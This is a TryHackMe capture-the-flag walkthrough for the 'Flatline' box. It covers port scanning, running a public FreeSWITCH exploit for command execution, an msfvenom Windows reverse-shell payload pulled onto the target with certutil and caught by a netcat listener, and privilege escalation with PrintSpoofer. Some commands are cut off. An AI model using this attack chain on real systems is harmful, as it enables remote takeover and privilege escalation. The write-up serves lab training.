Flatline – Walkthrough En | TryHackMe – Write-up

How low are your morals?


Flatline is a CTF easy ofTryHackme. It’s all classic. Enumeration, find exploit, perform privilege escalation.


Command :

nmap -sV -sC -p- -T5 -Pn

There is a service running on port 8021. It’s freeswitch.

Vulnerability research – freeswitch : 

searchsploit freeswitch

The 47799.txt file contains an exploit written in python. You have to rename it to .py

Command :

mv 47799.txt 47799.py

Initial Foothold

Does the exploit work? Is the service vulnerable. We don’t get a lot of information about the service itself. The only way to find out is to test…

Command :

python3.9 47799.py whoami

Resultat :

The exploit works. We were able to get the name of the user running the service.

It now takes the exploit to get a reverse shell.

Creating a payload

Command :

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4444 -f exe -o sr.exe

downloading the payload to the target

Setting up a Kali web server :

python3.9 -m http.server 8787

Command :

python3.9 47799.py ‘certutil -urlcache -split -f


Payload execution

Setting up a netcat listener :

nc -nlvp 4444

Command :

python3.9 47799.py ‘sr.exe’

Receiving the reverse shell :

Escalade de privilège.

Command :

whoami /priv

User has SeImpersonatePrivilege rights.



To increase its privileges via SeImpersonatePrivilege, it is possible to use the exploit printerspoofer.exe available at this address. 

Download :

certutil -urlcache -split -f


Commande :

PrintSpoofer.exe -i -c cmd

Please note that the command may not work the first time. Do not hesitate to restart it several times.


That’s all folks

Thank you for taking the trouble to come to the site to read this Write-Up

I hope he liked you more and that he taught you new things.

Feel free to leave a comment or share this article.